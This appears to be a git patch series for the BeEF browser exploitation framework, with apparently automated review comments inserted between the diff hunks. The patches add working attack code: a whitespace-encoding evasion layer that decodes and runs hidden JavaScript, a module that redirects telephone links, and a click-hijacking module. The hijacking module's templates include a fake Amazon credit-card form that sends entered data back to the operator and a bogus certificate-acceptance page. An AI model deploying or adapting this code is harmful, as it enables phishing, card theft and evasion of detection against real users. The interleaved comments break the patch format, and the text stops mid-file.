From 57f68725bcbe339bc40ef0d68a7810a9c96c95e1 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sat, 25 Aug 2012 18:54:15 +0930 Subject: [PATCH 1/8] Moved lcamtuf download module to social engineering category --- .../lcamtuf_download/command.js | 7 +++---- .../lcamtuf_download/config.yaml | 2 +- .../lcamtuf_download/module.rb | 3 +-- 3 files changed, 5 insertions(+), 7 deletions(-) rename modules/{browser => social_engineering}/lcamtuf_download/command.js (89%) rename modules/{browser => social_engineering}/lcamtuf_download/config.yaml (96%) rename modules/{browser => social_engineering}/lcamtuf_download/module.rb (97%) diff --git a/modules/browser/lcamtuf_download/command.js b/modules/social_engineering/lcamtuf_download/command.js similarity index 89% rename from modules/browser/lcamtuf_download/command.js rename to modules/social_engineering/lcamtuf_download/command.js index a827c99fa..2982cd00b 100644 --- a/modules/browser/lcamtuf_download/command.js +++ b/modules/social_engineering/lcamtuf_download/command.js @@ -21,12 +21,11 @@ beef.execute(function() { function doit() { - if (navigator.userAgent.indexOf('MSIE') == -1){ + if (!beef.browser.isIE()) { w = window.open('data:text/html,', 'foo'); - setTimeout(donext, 4500); - } + } function donext() { window.open(maliciousurl, 'foo'); @@ -34,5 +33,5 @@ beef.execute(function() { once = true; } doit(); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command executed"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); }); diff --git a/modules/browser/lcamtuf_download/config.yaml b/modules/social_engineering/lcamtuf_download/config.yaml similarity index 96% rename from modules/browser/lcamtuf_download/config.yaml rename to modules/social_engineering/lcamtuf_download/config.yaml index 0671d8844..329af0cbc 100644 --- a/modules/browser/lcamtuf_download/config.yaml +++ b/modules/social_engineering/lcamtuf_download/config.yaml 
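Review bot: Removing `setTimeout(donext, 4500);` leaves `donext` without any caller visible in this hunk while its definition stays in place, so unless something between the two hunks still invokes it the function is now dead code; the commit should say whether dropping the delayed call was intentional and, if so, delete `donext` too. The neighbouring `w = window.open('data:text/html,', 'foo');` assigns an implicit global on the hooked page; `var w = window.open(...)` keeps it local to `doit`. Both hunks sit inside `beef.execute`, whose body starts and ends outside the shown lines.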
@@ -17,7 +17,7 @@ beef: module: lcamtuf_download: enable: true - category: "Browser" + category: "Social Engineering" name: "Lcamtuf Download" description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative Content-Disposition: attachment header. For more information please refer to http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html ." authors: ["Bart Leppens"] diff --git a/modules/browser/lcamtuf_download/module.rb b/modules/social_engineering/lcamtuf_download/module.rb similarity index 97% rename from modules/browser/lcamtuf_download/module.rb rename to modules/social_engineering/lcamtuf_download/module.rb index 1d2b707dd..7d163b78c 100644 --- a/modules/browser/lcamtuf_download/module.rb +++ b/modules/social_engineering/lcamtuf_download/module.rb @@ -18,7 +18,6 @@ class Lcamtuf_download < BeEF::Core::Command # set and return all options for this module def self.options - return [{ 'name' => 'real_file_uri', 'description' => 'The web accessible URI for the real file.', @@ -33,7 +32,7 @@ class Lcamtuf_download < BeEF::Core::Command 'value' => '', 'width' => '300px' }, - { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Once', 'store_type' => 'arraystore', + { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore', 'store_fields' => ['do_once'], 'store_data' => [['false'],['true']], 'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true }] From 788cef08d3f18ab2bd2946219027e2a0f0cd57cc Mon Sep 17 00:00:00 2001 From: Jean-Louis Huynen Date: Wed, 29 Aug 2012 13:54:26 +0200 Subject: [PATCH 2/8] add whitespace obfuscation technique - should work in theory - but does not in practice --- extensions/evasion/obfuscation/whitespace.rb | 84 ++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 extensions/evasion/obfuscation/whitespace.rb 
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
new file mode 100644
index 000000000..5f640651c
--- /dev/null
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -0,0 +1,84 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module Evasion + class Whitespace + include Singleton + + def need_bootstrap + false + end + + def execute(input, config) + print_debug input.length + encoded = encode(input) + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + + config = BeEF::Core::Configuration.instance + hook = config.get("beef.http.hook_file") + host = config.get("beef.http.host") + port = config.get("beef.http.port") + decode_function = +" +//Dirty IE6 whitespace bug hack +#{var_name} = function (){ + jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) { + var output = ''; + var str = '//E'+'OH'; + var chunks = data.split(str); + for (var i = 0; i < chunks.length; i++) + { + if(chunks[i].substring(0,4) == '----') + { + input = chunks[i].split('\\n'); + input = input[0].substring(5); + for(y = 0; y < input.length/8; y++) + { + v = 0; + for(x = 0; x < 8; x++) + { + if(input.charCodeAt(x+(y*8)) > 9) + { + v++; + } + if(x != 7) + { + v = v << 1; + } + } + output += String.fromCharCode(v); + } + } + }alert(output.length);[].constructor.constructor(output)(); + }, 'text'); +} +#{var_name}();//EOH-----" + + input = "#{decode_function}#{encoded}" + print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded" + input + end + + def encode(input) + output = input.unpack('B*') + output = 
output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ') + output + end + end + end + end +end From e86712413ca64d0c9f0a646ad1481320680153b9 Mon Sep 17 00:00:00 2001 From: Jean-Louis Huynen Date: Wed, 29 Aug 2012 18:22:22 +0200 Subject: [PATCH 3/8] modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :) --- core/main/handlers/modules/beefjs.rb | 3 +- extensions/evasion/config.yaml | 5 +- extensions/evasion/extension.rb | 1 + extensions/evasion/obfuscation/whitespace.rb | 76 ++++++++------------ 4 files changed, 35 insertions(+), 50 deletions(-) diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 8e30ae735..38e48f05c 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -104,8 +104,7 @@ module BeEF if config.get("beef.extension.evasion.enable") evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) - @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook + @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) else @final_hook = ext_js_to_not_obfuscate + @hook end diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml index 712989a31..7d9db7f91 100644 --- a/extensions/evasion/config.yaml +++ b/extensions/evasion/config.yaml @@ -16,7 +16,7 @@ beef: extension: evasion: - enable: true + enable: true name: 'Evasion' authors: ["antisnatchor"] exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"] @@ -26,4 +26,5 @@ beef: beef: "beef" Beef: "Beef" evercookie: "evercookie" - chain: ["scramble", "minify"] + #chain: ["scramble", "minify"] + chain: ["minify", "base64", "whitespace"] 
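Review bot: `encode` converts the one-element array from `input.unpack('B*')` to its inspected string and then uses a character-class regex only to strip the `[`, `"` and `]` that the inspection added, which is fragile and hides that this is a single bit-string translation. `input.unpack('B*').first.tr('01', "\t ")` yields the same tab/space string directly and makes the intermediate `output =` reassignment unnecessary. In `execute`, the `config` parameter is shadowed by `config = BeEF::Core::Configuration.instance` two lines later, so the caller's argument is silently ignored; either drop the reassignment or rename the local.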
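Review bot: The default obfuscation chain in `extensions/evasion/config.yaml` is switched to `chain: ["minify", "base64", "whitespace"]`, ending with a technique that the previous commit message describes as not working in practice and this one as merely seeming to work better; making it the default for every installation is premature. Keep `chain: ["scramble", "minify"]` as the shipped default and document the experimental chain in a comment, rather than leaving the old value commented out above the new one. The `enable: true` change in the earlier hunk of this file is whitespace only.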
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index ce1fc360e..e7e5c25d5 100644
--- a/extensions/evasion/extension.rb
+++ b/extensions/evasion/extension.rb
@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
 require 'extensions/evasion/obfuscation/scramble'
 require 'extensions/evasion/obfuscation/minify'
 require 'extensions/evasion/obfuscation/base_64'
+require 'extensions/evasion/obfuscation/whitespace'
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
index 5f640651c..8c20217f4 100644
--- a/extensions/evasion/obfuscation/whitespace.rb
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -20,56 +20,40 @@ module BeEF include Singleton def need_bootstrap - false + true + end + + def get_bootstrap + # the decode function is in plain text - called IE-spacer - because trolling is always a good idea + decode_function = +"//Dirty IE6 whitespace bug hack +function IE_spacer(css_space) { + var spacer = ''; + for(y = 0; y < css_space.length/8; y++) + { + v = 0; + for(x = 0; x < 8; x++) + { + if(css_space.charCodeAt(x+(y*8)) > 9) + { + v++; + } + if(x != 7) + { + v = v << 1; + } + } + spacer += String.fromCharCode(v); + }return spacer; +}" end def execute(input, config) - print_debug input.length + size = input.length encoded = encode(input) - var_name = BeEF::Extension::Evasion::Helper::random_string(3) - - config = BeEF::Core::Configuration.instance - hook = config.get("beef.http.hook_file") - host = config.get("beef.http.host") - port = config.get("beef.http.port") - decode_function = -" -//Dirty IE6 whitespace bug hack -#{var_name} = function (){ - jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) { - var output = ''; - var str = '//E'+'OH'; - var chunks = data.split(str); - for (var i = 0; i < chunks.length; i++) - { - if(chunks[i].substring(0,4) == '----') - { - input = chunks[i].split('\\n'); - input = input[0].substring(5); - for(y = 0; y < input.length/8; y++) - { - v = 0; - for(x = 0; x < 8; x++) - { - if(input.charCodeAt(x+(y*8)) > 9) - { - v++; - } - if(x != 7) - { - v = v << 1; - } - } - output += String.fromCharCode(v); - } - } - }alert(output.length);[].constructor.constructor(output)(); - }, 'text'); -} -#{var_name}();//EOH-----" - - input = "#{decode_function}#{encoded}" - print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded" + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();" + print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced" input end 
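Review bot: The `IE_spacer` function emitted by `get_bootstrap` assigns `y`, `v` and `x` without `var`, so each decode leaks three globals into the hooked page's window; a `var y, v, x;` at the top of the function keeps them local. In `execute` the `config` parameter is no longer read at all after this change, which deserves a comment if the signature is kept for the chain interface. The debug line `"[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"` would read better as `"[OBFUSCATION - WHITESPACE] #{size} bytes of JavaScript code have been whitespace-encoded"`. The `Whitespace` class opens before this hunk and `encode` follows after it.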
From ab588c0f6816e87f03ee79c5f33cd108b41691be Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 2 Sep 2012 16:58:43 +0930 Subject: [PATCH 4/8] Add link_rewrite_tel module Fixes issue #721 --- core/main/client/dom.js | 25 +++++++++++++++++ .../hooked_domain/link_rewrite_tel/command.js | 24 ++++++++++++++++ .../link_rewrite_tel/config.yaml | 25 +++++++++++++++++ .../hooked_domain/link_rewrite_tel/module.rb | 28 +++++++++++++++++++ 4 files changed, 102 insertions(+) create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/command.js create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/config.yaml create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/module.rb diff --git a/core/main/client/dom.js b/core/main/client/dom.js index 387b514bf..4cb0c2cba 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -194,6 +194,31 @@ beef.dom = { return count; }, + /** + * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number + * @param: {String} new_number: the new link telephone number to be written + * @param: {String} selector: the jquery selector statement to use, defaults to all a tags. + * @return: {Number} the amount of links found in the DOM and rewritten. + */ + rewriteTelLinks: function(new_number, selector) { + + var count = 0; + var re = new RegExp("tel:/?/?.*", "gi"); + var sel = (selector == null) ? 'a' : selector; + + $j(sel).each(function() { + if ($j(this).attr('href') != null) { + var url = $j(this).attr('href'); + if (url.match(re)) { + $j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; }); + count++; + } + } + }); + + return count; + }, + /** * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}] 
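Review bot: `rewriteTelLinks` reads `$j(this).attr('href')` twice per anchor and chains a `.click(function() { return true; })` handler that does nothing; `var url = $j(this).attr('href'); if (url != null && url.match(re)) { $j(this).attr('href', url.replace(re, "tel:"+new_number)); count++; }` expresses the same thing without the redundant lookup and the no-op handler. The pattern `tel:/?/?.*` is unanchored, so an href that merely contains `tel:` somewhere after its scheme is also rewritten, which is more than the doc comment ("replacing all telephone urls") describes; anchoring with `^tel:` matches the documentation, assuming that is the intent. The `beef.dom` object literal begins and ends outside this hunk.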
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js new file mode 100644 index 000000000..d51007a95 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js @@ -0,0 +1,24 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var tel_number = "<%= @tel_number %>"; + var selector = "a"; + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number); + +}); + diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml new file mode 100644 index 000000000..68618861e --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml 
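Review bot: `var tel_number = "<%= @tel_number %>";` drops the option value straight into a JavaScript string literal, so a value containing a double quote or backslash breaks the generated script instead of failing cleanly; the module should serialise it with a JSON encoder, or validate it as a plain dial string before templating. `selector` is a hard-coded `"a"` even though `rewriteTelLinks` already defaults to `'a'` when passed `null`, so the local adds nothing; either pass `null` or drop the variable and a comment explaining the choice.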
@@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + link_rewrite_tel: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Replace HREFs (TEL)" + description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb new file mode 100644 index 000000000..929c62356 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb 
@@ -0,0 +1,28 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Link_rewrite_tel < BeEF::Core::Command + + def self.options + return [ + { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From 931aeb6ee591c94adf9232900a78a6260b39f32b Mon Sep 17 00:00:00 2001 From: qswain2 Date: Mon, 3 Sep 2012 09:46:03 -0400 Subject: [PATCH 5/8] Fixed the module count in the ui to include sub modules (issue 708) --- extensions/admin_ui/controllers/modules/modules.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index a3d0c087c..b10ccc4bf 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb 
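Review bot: `self.options` uses an explicit `return [ ... ]`, which the first commit of this series removes from `Lcamtuf_download.options`; for consistency the array literal should simply be the method's last expression. The lcamtuf module also carries `# set and return all options for this module` above the method, and a matching one-line comment here, plus one on `post_execute` saying it stores the zombie's `result` field, would bring the new module in line with the project's style.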
@@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController # append the number of command modules so the branch name results in: " (num)" parent.each {|command_module_branch| if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children') - num_of_command_modules = command_module_branch['children'].length - command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" - + num_of_subs = 0 command_module_branch['children'].each {|c| + #add in the submodules and subtract 1 for the folder node + num_of_subs+=c['children'].length-1 if c.has_key?('children') retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder' } + num_of_command_modules = command_module_branch['children'].length + num_of_subs + command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" + end } end From 05d7fe3adf0a48d879894c2affaa53418e49a306 Mon Sep 17 00:00:00 2001 
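Review bot: `num_of_subs+=c['children'].length-1` only counts children one level below the current branch, whereas `retitle_recursive_tree([c])` on the next line recurses into nested folders, so a folder nested two levels deep contributes one to the parent's count rather than the number of modules it contains — assuming the tree can nest that deep, which the hunk does not show. The line also wants spaces around its operators, `num_of_subs += c['children'].length - 1`, and the comment above it would be clearer as `# count submodules inside folder nodes; -1 drops the folder node itself`. The enclosing method starts before and ends after this hunk.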
From: Jean-Louis Huynen Date: Tue, 4 Sep 2012 17:47:59 +0200 Subject: [PATCH 6/8] Adding the Simple Hijacker module in social engineering (route clicks on some links to javascript code) --- .../simple_hijacker/command.js | 37 ++++++ .../simple_hijacker/config.yaml | 26 +++++ .../simple_hijacker/module.rb | 50 +++++++++ .../simple_hijacker/templates/amazon.js | 28 +++++ .../templates/chromecertbeggar.js | 50 +++++++++ .../simple_hijacker/templates/confirmbox.js | 10 ++ .../simple_hijacker/templates/credential.js | 105 ++++++++++++++++++ 7 files changed, 306 insertions(+) create mode 100644 modules/social_engineering/simple_hijacker/command.js create mode 100644 modules/social_engineering/simple_hijacker/config.yaml create mode 100644 modules/social_engineering/simple_hijacker/module.rb create mode 100644 modules/social_engineering/simple_hijacker/templates/amazon.js create mode 100644 modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js create mode 100644 modules/social_engineering/simple_hijacker/templates/confirmbox.js create mode 100644 modules/social_engineering/simple_hijacker/templates/credential.js diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js new file mode 100644 index 000000000..adcc3e4b2 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/command.js 
@@ -0,0 +1,37 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +hijack = function(){ + function send(answer){ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); + } + <% target = @targets.split(',') %> + $j('a').click(function(e) { + e.preventDefault(); + if ($j(this).attr('href') != '') + { + if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{ + <%= instance_variable_get("@#{@choosetmpl}") %> + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href')); + } + } + }); +} + +beef.execute(function() { + hijack(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action'); +}); diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml new file mode 100644 index 000000000..8fbb9209d --- /dev/null +++ b/modules/social_engineering/simple_hijacker/config.yaml 
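Review bot: The click handler calls `$j(this).attr('href').indexOf(...)` after checking only `!= ''`, so an anchor with no `href` attribute (where `attr` returns `undefined`) throws inside the handler; read it once with `var href = $j(this).attr('href'); if (href) { ... }` before the comparison. The ERB loop that assembles the `if(` condition also emits `if( {` when `@targets` is empty, because `''.split(',')` is `[]`, and a target containing a double quote breaks the generated string literal; rendering the list once as a JavaScript array and testing it with a loop in the handler avoids both failure modes. `hijack = function(){` declares an implicit global as well, and the module's `command.js` is an ERB template, so a comment noting that `<% target = @targets.split(',') %>` runs server-side would help readers.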
@@ -0,0 +1,26 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + simple_hijacker: + enable: true + category: "Social Engineering" + name: "Simple Hijacker" + description: "Hijack clicks on links to display what you want." + templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"] + authors: ["gallypette"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb new file mode 100644 index 000000000..d9a66c1dd --- /dev/null +++ b/modules/social_engineering/simple_hijacker/module.rb 
@@ -0,0 +1,50 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Simple_hijacker < BeEF::Core::Command + + def self.options + + config = BeEF::Core::Configuration.instance + @templates = config.get('beef.module.simple_hijacker.templates') + + # Defines which domains to target + data = [] + data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'}) + + # We'll then list all templates available + tmptpl = [] + @templates.each{ |template| + tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js" + raise "Invalid template path for command template #{template}" if not File.exists?(tplpath) + file = File.open(tplpath, "r") + data.push({'name' => template, 'type' => 'hidden', 'value' => file.read}) + tmptpl<<[ template] + } + + data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"}) + + return data + end + + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'answer' => @datastore['answer']}) + end + +end 
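Review bot: `file = File.open(tplpath, "r")` followed by `file.read` never closes the handle, so each render of the options leaks one file descriptor per template; `File.read(tplpath)` returns the contents and closes the file in one call. `raise "..." if not File.exists?(tplpath)` is better written `unless File.exist?(tplpath)`, and the trailing `return data` can go, matching the `return` removal in the first commit of this series. The UI strings `'list domains you want to hijack - separed by ,'` and `'Targetted domains'` contain typos (`separated`, `Targeted`), and `tmptpl<<[ template]` wants normal spacing, `tmptpl << [template]`.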
diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js new file mode 100644 index 000000000..0c58ba121 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/amazon.js @@ -0,0 +1,28 @@ + beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); + $j(document).attr('title', $j(this).html()); + document.body.scroll = 'no'; + document.documentElement.style.overflow = 'hidden'; + + collect = function(){ + answer = ""; + $j(":input").each(function() { + answer += " "+$j(this).attr("name")+":"+$j(this).val(); + }); + send(answer); + } + + // floating div + function writediv() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'hax'); + sneakydiv.setAttribute('display', 'block'); + sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;'); + document.body.appendChild(sneakydiv); + sneakydiv.innerHTML= '
Your credit card details expired, please enter your new credit card credential to continue shopping-
Changes made to your payment methods will not affect orders you have already placed.
Your Account>

Add a Credit or Debit Card

  Edit your payment method:
Cardholder Name:
Exp. Date: 
Number:

Confirm
'; + } + + writediv(); + + $j("#confirm").click(function () { + $j('#hax').remove(); + }); diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js new file mode 100644 index 000000000..d1adce6d5 --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js @@ -0,0 +1,50 @@ + // floating div + function writediv() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'background'); + sneakydiv.setAttribute('oncontextmenu','return false;'); + sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#500; font-family:Helvetica,Arial,sans-serif; margin:0px;'); + document.body.appendChild(sneakydiv); + sneakydiv.innerHTML= '
background
SSL Error Icon
Please accept our new SELF®-Signed Certificate to ensure maximum security protection.
'+domain+' chose SELF® to protect your security. If your browser raise any warning after this one it means that it\'s not up-to-date. Accept this certificate then please consider updating your browser as soon as possible.

SELF® - to make the Internet a safer place.
read more about the SELF® certification authority

Security Enhanced Layer Factory®: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF® help people as customer or seller to feel safe by issuing SELF®-signed certificate that are build to last. With SELF® you will never be harmed again - Trust is our workship.

Security Enhanced Layer Factory®, SELF® and SELF® logo are registered trademarks.

'; + toggleMoreInfo(true); + setDirectionSensitiveImages(); + } + + forward = function(){ + send("User continuing to "+target); + timer=setInterval(function(){window.location = target;},500); + } + + getDomain = function(url){ + return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2]; + } + + function $(o) {return document.getElementById(o);} + + sendCommand = function(cmd) { + window.domAutomationController.setAutomationId(1); + window.domAutomationController.send(cmd); + } + + toggleMoreInfo = function(collapse) { + if (collapse) { + $("more_info_long").style.display = "none"; + $("more_info_short").style.display = "block"; + } else { + $("more_info_long").style.display = "block"; + $("more_info_short").style.display = "none"; + } + } + setDirectionSensitiveImages = function () { + if (document.documentElement.dir == 'rtl') { + $("twisty_closed_rtl").style.display = "inline"; + } else { + $("twisty_closed").style.display = "inline"; + } + } + + target = $j(this).attr('href'); + domain = getDomain(target); + $j(document).attr('title', domain+" Security Enhanced Layer Factory® certificate acceptance"); + writediv(); + diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js new file mode 100644 index 000000000..d8c79bc7b --- /dev/null +++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js @@ -0,0 +1,10 @@ +var answer = confirm("Do you really want to leave us ??") +if (answer){ + alert("Okay :(") + send("User chose to leave."); + window.location = $j(this).attr('href'); +} +else{ + alert("Okay enjoy ") + send("User chose to stay."); +} diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js new file mode 100644 index 000000000..d0b1eacb0 --- /dev/null +++ 